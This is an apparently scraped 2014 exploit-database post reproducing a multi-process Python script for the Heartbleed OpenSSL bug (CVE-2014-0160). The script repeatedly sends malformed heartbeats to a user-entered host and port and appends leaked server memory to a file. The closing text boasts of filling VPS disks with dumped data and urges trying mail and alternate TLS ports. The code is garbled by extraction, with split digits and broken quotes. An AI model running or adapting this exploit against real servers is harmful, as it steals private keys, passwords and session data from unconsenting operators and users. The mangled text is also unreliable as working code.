OpenSSL multi-threaded, multi-domain EXP with custom-port support, saving output to a binary file to save space — bug warning — the black bar safety net

2014-05-22T00:00:00
ID MYHACK58:62201447398
Type myhack58
Reporter 佚名
Modified 2014-05-22T00:00:00

Description

!/ usr/bin/python

Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

The author disclaims copyright to this source code.

Multi process and bin dump version by anthrax@insight-labs.org

import sys import struct import socket import time import select import re from multiprocessing import Process,Lock,Manager

# Worker-process count spawned per target host (used by main) and the
# inter-process lock that serializes the file writes done in hexwrite.
THREADS = 5 lock = Lock()

# Converts a hex string (spaces and newlines tolerated) to raw bytes using the
# Python 2-only str.decode('hex'); the lone " in each replace() call appears
# to be an extraction artefact of an empty '' literal.
def h2bin(x): return x. replace(' ', "). replace('\n', "). decode('hex')

# Pre-built TLS records (the hex digits below were spaced apart by extraction).
# hello: the ClientHello that fuckit sends right after connecting.
# hb: the heartbeat request sent by fuckit and again by hit_hb.
# NOTE(review): both records are fixed byte strings, so this tool's traffic is
# presumably a static on-wire pattern a network sensor could match - confirm
# against a capture.
hello = h2bin("' 1 6 0 3 0 2 0 0 dc 0 1 0 0 0 0 d8 0 3 0 2 5 3 4 3 5b 9 0 9d 9b 7 2 0b bc 0c bc 2b 9 2 a8 4 8 9 7 cf bd 3 9 0 4 cc 1 6 0a 8 5 0 3 9 0 9f 7 7 0 4 3 3 d4 de 0 0 0 0 6 6 c0 1 4 c0 0a c0 2 2 c0 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 c0 0f c0 0 5 0 0 3 5 0 0 8 4 c0 1 2 c0 0 8 c0 1c c0 1b 0 0 1 6 0 0 1 3 c0 0d c0 0 3 0 0 0a c0 1 3 c0 0 9 c0 1f c0 1e 0 0 3 3 0 0 3 2 0 0 9a 0 0 9 9 0 0 4 5 0 0 4 4 c0 0e c0 0 4 0 0 2f 0 0 9 6 0 0 4 1 c0 1 1 c0 0 7 c0 0c c0 0 2 0 0 0 5 0 0 0 4 0 0 1 5 0 0 1 2 0 0 0 9 0 0 1 4 0 0 1 1 0 0 0 8 0 0 0 6 0 0 0 3 0 0 ff 0 1 0 0 0 0 4 9 0 0 0b 0 0 0 4 0 3 0 0 0 1 0 2 0 0 0a 0 0 3 4 0 0 3 2 0 0 0e 0 0 0d 0 0 1 9 0 0 0b 0 0 0c 0 0 1 8 0 0 0 9 0 0 0a 0 0 1 6 0 0 1 7 0 0 0 8 0 0 0 6 0 0 0 7 0 0 1 4 0 0 1 5 0 0 0 4 0 0 0 5 0 0 1 2 0 0 1 3 0 0 0 1 0 0 0 2 0 0 0 3 0 0 0f 0 0 1 0 0 0 1 1 0 0 2 3 0 0 0 0 0 0 0f 0 0 0 1 0 1 "')

hb = h2bin("' 1 8 0 3 0 2 0 0 0 3 0 1 4 0 0 0 "')

# Prints s as a classic hex/ASCII dump (offset, hex bytes, printable chars,
# non-printables shown as '.'); hit_hb calls it for alert payloads.
# Python 2 print statements and xrange; the "6 4" / "1 6" step and width
# values are digit pairs split by extraction.
def hexdump(s): for b in xrange(0, len(s), 6 4): lin = [c for c in s[b : b + 1 6]] hxdat = ' '. join('%02X' % ord(c) for c in lin) pdat = ". join((c if 3 2 <= ord(c) <= 1 2 6 else '.' )for c in lin) print '%04x: %-48s %s ' % (b, hxdat, pdat) print

# Appends the raw payload s to the already-open file fn while holding the
# module-level lock, presumably so the THREADS worker processes do not
# interleave their writes; prints a progress line per write.
def hexwrite(s,fn):

lock. acquire() fn. write(s)

print 'data dumped...'

lock. release()

# Reads exactly `length` bytes from socket s within an overall `timeout`
# budget (seconds); returns the accumulated data, or None once the deadline
# passes or the peer closes (empty recv).  Each select() waits up to 5 s
# regardless of the remaining budget, and a recv() error is only printed,
# leaving `data` stale or unbound for the `if not data` test below.
# The bare "EOF?" line was a comment in the original source.
def recvall(s, length, timeout=5): endtime = time. time() + timeout rdata = " remain = length while remain > 0: rtime = endtime - time. time() if rtime < 0: return None r, w, e = select. select([s], [], [], 5) if s in r: try: data = s. recv(remain) except Exception as e: print e pass

EOF?

if not data: return None rdata += data remain -= len(data) return rdata

# Reads one TLS record from s: a 5-byte header unpacked as '>BHH'
# (content type, version, payload length), then the payload of that length
# with a 10 s budget.  Returns (type, version, payload), or (None, None, None)
# after printing a message if either read hits EOF/timeout.
def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct. unpack('>BHH', hdr) pay = recvall(s, ln, 1 0) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None

print '... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

return typ, ver, pay

# Sends the heartbeat record hb on s and reads records until one of:
#   - the connection closes (typ None): prints a message, returns False;
#   - a heartbeat response (the garbled "2 of 4" is presumably record type 24):
#     payload is appended to fn via hexwrite; returns True, printing a
#     "malformed heartbeat" note when the payload is shorter than 3 bytes;
#   - an alert ("2 1", presumably type 21): payload is hexdump'ed, returns False.
# Any other record type is silently skipped and the loop continues.
def hit_hb(s,fn): s. send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False

if typ == 2 of 4:

print 'Received heartbeat response:'

hexwrite(pay,fn) if len(pay) < 3: print 'Server processed malformed heartbeat, but did not return any extra data.' return True

if typ == 2 1:

print 'Received alert:'

hexdump(pay) print 'Server returned error, likely not vulnerable' return False

# Worker-process body.  Connects a TCP socket to (domain, port), sends the
# ClientHello, reads records until a handshake record (type 22) whose first
# payload byte is 0x0E (ServerHelloDone), then sends hb and hands the socket
# to hit_hb before closing it.  The outer `while True` repeats the whole
# sequence until some exception is raised (printed, then break); returning
# early only happens when the server closes before ServerHello.  Nothing else
# bounds the number of iterations or the amount of data written to fn.
# The bare "Look for server hello done message." line was a comment in the
# original source.
def fuckit(domain,port,fn): while True: try: s = socket. socket(socket. AF_INET, socket. SOCK_STREAM)

print 'Connecting...'

sys. stdout. flush()

s. connect((domain, port))#print 'Sending Client Hello...'

sys. stdout. flush()

s. send(hello)

print 'Waiting for Server Hello...'

sys. stdout. flush()

while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return

Look for server hello done message.

if typ == 2 2 and ord(pay[0]) == 0x0E: break

print 'Sending heartbeat request...'

sys. stdout. flush()

s. send(hb)

hit_hb(s,fn) s. close() except Exception as e: print e break

# Interactive entry point.  Loops forever prompting for "host:port"
# (the variable is `indata`, split by extraction); the port falls back to
# 443 via a bare except when missing or unparseable, and names shorter than
# 5 characters are rejected.  Opens "<domain>.bin" for append and starts
# THREADS daemon processes running fuckit with that shared file handle;
# the processes are never joined and the file is never closed here.
def main(): while True: in data=raw_input("Enter domain name and port, example: google. com:4 4 3 : ") print in data domain=in data. split(':')[0] try: port=int(in data. split(':')[1]) except: port=4 4 3 if len(domain)<5: print 'wrong domain' continue print 'fucking '+domain+' @ port '+str(port)+'...' fn=open(domain+'. bin','ab') for j in xrange(THREADS): t = Process(target=fuckit,args=(domain,port,fn)) t. daemon=True t. start()

# Script entry guard; the dunder underscores of __name__ / '__main__' were
# lost in extraction.
if name == 'main': main()

Very simple to use, it is recommended in the linux running under windows there are compatibility issues. By default each ip open 5 threads. Yesterday our friends with the 1 0 more vps hard disk ran full....... By the way, you can try it for 4 6 for 5, 9 9 5, 8 4 4 3 like the port, there are surprises.